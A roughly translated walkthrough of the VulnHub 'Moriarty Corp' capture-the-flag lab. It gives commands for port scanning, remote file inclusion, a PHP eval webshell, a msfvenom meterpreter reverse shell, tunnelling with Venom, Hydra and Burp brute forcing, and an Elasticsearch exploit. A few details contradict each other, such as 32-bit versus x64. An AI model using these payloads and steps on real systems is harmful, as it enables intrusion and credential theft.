MORIARTY CORP target shooting process (completed)

Table of Contents

1. Environment setup

2. Target drone

3. Tool preparation

4. Detailed steps

1. Information collection

1.1 Port scanning (all ports)

1.1.1 Perform port detection on the target machine IP. To prevent leakage, be sure to use full port scanning.

1.1.2 In order to prevent missing scans, nmap is used here to perform a full port scan.

1.2 8000 port exploration


Find the first flag

1.3 9000 port exploration

2. File contains

2.1 Make sure the file contains

2.2 Write a sentence Trojan

Find the second flag

3. Rebound shell

3.1 Check the system kernel version

3.2 Making Linux Trojan

3.3 Upload Trojans

3.4 Msf turns on monitoring

3.5 Run Trojan

3.6 Establish a session

4.Intranet penetration

4.1 Build an agent

4.1.1 Enable venom server monitoring

4.1.2 Open venom client

4.1.3 Using socks5 proxy

4.2 Intranet detection

4.2.1 Detecting live web hosts on the intranet

4.3 File upload (

4.3.1 Set browser proxy

4.3.2 Accessing the website

4.3.3 Brute force cracking

4.3.4 Connect to webshell

Find the third flag

5. Brute force the connection ssh* (

5.1Submit flag

5.2 Use online md5 decryption tool to decrypt the above hash

5.3 Scan intranet hosts with port 22

5.4 Brute force cracking with Hydra

5.5 Remote connection ssh

Found the fourth flag

6. Unauthorized access (

6.1Submit flag

6.2 Scan the intranet host IP of the chat server

6.3 Access to the website

6.4 Change administrator password

6.5 Log in to the admin user interface

7. Elasticsearch vulnerability (

7.1Submit flag

7.2 Find the intranet host with port 9200

7.3 Use searchsploit to search for Elasticsearch vulnerability exploitation scripts

7.4 Utilizing scripts

Get the sixth flag

1. Environment construction

Shooting Range Download: BoredHackerBlog: Moriarty Corp ~ VulnHub

Attack aircraft: (kali)

Target drone:

Change root password in Ubuntu 18.04:

Press shift when booting up and select the second option.

Choose the second option.

Select root.

passwd root changes password.

2. Target of drone

Find six flag values.

3. Tool preparation

Port scanning: masscan, nmap

Webshell tools: gozilla, ant sword

Packet capture: burpsuite

Proxy: proxychains, venom (

Four. Detailed steps

1. Information collection

1.1 Port Scan (Full Port)

1.1.1 Perform port detection on the target machine IP. To prevent leakage, be sure to use full port scanning.

Tools used: masscan

masscan -p 0-65535 --rate=1000

1.1.2 To prevent missed scans, nmap is used to perform a full-port scan. .

Tools used: nmap

nmap -sS -p 0-65535

A total of three ports were found – 22 (ssh), 8000 (http), 9000 (cslistener).

1.2 9000 port exploration

Portainer is an open source Docker container management system. From this, it can be seen that the current website is likely to be in docker and needs to be docker escaped.

I tried the default password admin/admin, but couldn’t log in. The brute force cracking failed, so I looked for other breakthroughs.

1.3 8000 port exploration

First flag found


According to the page prompts, access port 80


The following interface is obtained. It is suspected that there is a file containing

2. File contains

2.1 Confirm the existence of file inclusion

Test that the following payload does exist and is included in the file:

2.2 Write a sentence Trojan

Start the web service in any folder of kali.

Python3 -m http.server

Create the bb.txt file in the directory where the web service is enabled. The content is:

<?php phpinfo();?>

The remote file contains bb.txt on kali to test whether it is successful.

The following page appears to prove that remote file inclusion can be used:

Modify the content of bb.txt into a one-sentence Trojan

<?php @eval($_POST[cmd’]);?>

Connect to the webshell management tool, here I use Ant Sword.

Second flag found


View the file and go to to submit the flag.

Get the next page. According to the page prompts, there is a database website, intranet IP:

3.Rebound shell

3.1 Check the system kernel version

Obtain the system kernel: linux 4.15, 64-bit. This step is very important and is related to the subsequent production of Trojans.

uname -a

3.2 Making a Linux Trojan

Tools used: msfvnom

Since the target system is a 32-bit Linux system, you must select the Linux/x86 module when selecting the payload. The module that was previously set to x64 cannot be executed on the target machine.

msfvenom -p linux/x64/meterpreter_reverse_tcp lhost= lport=9999 -f elf > cacaca.elf

3.3 Upload Trojan

Upload the Trojan directly through Ant Sword

Add executable permissions to the Trojan

ls -al #View permissions

chmod 777 cacaca.elf

3.4 Msf turns on monitoring

Msfconsole #Start the msf tool

use exploit/multi/handler

Set payload linux/x64/meterpreter/reverse_tcp #The module here must be the same as the module in the Trojan

Set lhost #Same as in Trojan

Set lport 9999 #Same as in Trojan

Run #Start monitoring

3.5 running Trojan

Run cacaca.elf, in Godzilla’s command execution terminal, switch to the location where the Trojan is stored and execute it directly.


3.6 Create session

msf gets a meterpreter (session), but the permissions are very low, just the apache user.

4. Intranet penetration

According to the prompt web page, it indicates that there is an intranet.

4.1 Build a proxy

Tools used: venom

4.1.1 Enable venom server monitoring

Start the venom server and listen for connections on port 3333.

./admin_linux_x64 lport 3333

4.1.2 Open venom client

Enable the http service in the venom directory

Python3 -m http.server

Download the agent_linux_x64 client file on the target machine


Open the client on the target machine to establish a connection with the server, and the server generates a node that connects to the client.

Chmod + x ./agent_linux_x64 #Add executable permissions

./agent_linux_x64 rhost -rport 3333

4.1.3 Use socks5 proxy

Check the current node number, enter the node, and set socks5.


Goto 2 #Enter the node and note that its number is consistent with the one viewed

Socks 8376 #The default is socks5

4.2 Intranet Detection

4.2.1 Detecting web hosts that are alive in the intranet

According to the prompt on the flag submission page, there is a database website on the intranet, so the host IP of the surviving web service on the intranet is detected, and the network segment range is

Tools used: proxychains

Modify the configuration proxychains file and add the socks5 proxy just built on venom in the last line.

Vim /etc/proxychains4.conf

Socks5 8376

Start detecting intranet surviving hosts

proxychains nmap -sV -sT -Pn -T4 -p80

The detection results are as follows. Port 80 of the host is alive.

4.3 File Upload (

4.3.1 Set browser proxy

Tools used: Firefox plug-in foxyproxy

The browser proxy configuration is as follows:

4.3.2 Visit the website

Access the web website of the intranet host and find the file upload function point but a password is required.

4.3.3 Brute force cracking

Brute force cracking of file upload passwords

Tools used: burpsuite

1. Set the bp upper-level proxy, and set the port to the proxy port 8376 previously set on venom, as shown in the figure:

2. Set up a bp local proxy, which will capture browser data packets.

3. Set the browser proxy to bp’s local proxy.

4. Capture packets when uploading files and set the file upload password as the blast point.

5. Set the payload and start blasting.

6. Brute force cracking is successful, the password is password

4.3.4 Connect to webshell

1. Generate Godzilla Trojan bb.php

2. Change the browser proxy back to socks5 proxy and upload the Trojan file bb.php

3. Directly right-click the bb.php link to obtain the storage path of bb.php on the website.

4. Connect to Godzilla and pay attention to setting the proxy.

The third flag found


5. Brute force to connect ssh* (

5.1 Submit flag

Get next step tips:

Some username and password hashes for ssh, using these usernames and passwords to continue the attack.

5.2 Use the online md5 decryption tool to decrypt the above hash

Online tools: MD5 free online decryption cracking_MD5 online encryption-SOMD5 decryption results:

63a9f0ea7bb98050796b649e85481845 (root)

7b24afc8bc80e548d66c4e7ff72171c5 (toor)

5f4dcc3b5aa765d61d8327deb882cf99 (password)

21232f297a57a5a743894a0e4a801fc3 (admin)

084e0343a0486ff05530df6c705c8bb4 (guest)

697c6cc76fdbde5baccb7b3400391e30 (MORIARTY)

8839cfc8a0f24eb155ae3f7f205f5cbc (MCORP)

35ac704fe1cc7807c914af478f20fd35 (mcorp)

b27a803ed346fbbf6d2e2eb88df1c51b (weapons)

08552d48aa6d6d9c05dd67f1b4ba8747 (moriarty)

5.3 Scan for intranet hosts with port 22

proxychains nmap -p22 -sT -Pn

5.4 Brute force cracking with Hydra

Store the username and clear text password in user.txt and pass.txt respectively.

proxychains hydra -L user.txt -P pass.txt ssh://

The results are as follows: root weapons

5.5 remote connection ssh

The permission is root.

Fourth flag found


6. Unauthorized access (

6.1 Submit flag

Get a tip: There is another website, the port is not 80, but one of 443, 8000, 8080, 8888.

Username: buyer13

Password: arms13

6.2 Scan the intranet host IP of the chat server

 proxychains nmap -p443,8080,8000,8888 -sT -Pn

The result is as follows:

6.3 Visit the website

Enter the username and password obtained previously:

Username: buyer13

Password: arms13

Click chats and find the administrator username: admin.

6.4 Change administrator password

Click change password to enter the password change interface.

1. Bp packet capture

2. Modify the package and change the admin password to 123456

6.5 Login admin user interface

Note: If the buyer user cannot log out in Kali, change the browser.

The local browser is used here, and the proxy settings are as follows:

Log in as admin user

Find the fifth flag


7. Elasticsearch vulnerability (

7.1 Submit flag

According to the prompt: there is a back-end database and Elasticsearch is used. Elasticsearch is an open source, highly scalable distributed full-text search engine that listens to port 9200 by default.

7.2 Find intranet hosts with port 9200

proxychains nmap -sV -sT -Pn -T4 -p9200

searchsploit -t Elasticsearch

searchsploit -x linux/remote/

cp /usr/share/exploitdb/exploits/linux/remote/ ./

7.4 Exploiting Scripts

proxychains curl -XPOST '' -d '{"name":"ss"}'

proxychains python2
Get the sixth flag


Submit the flag and end.

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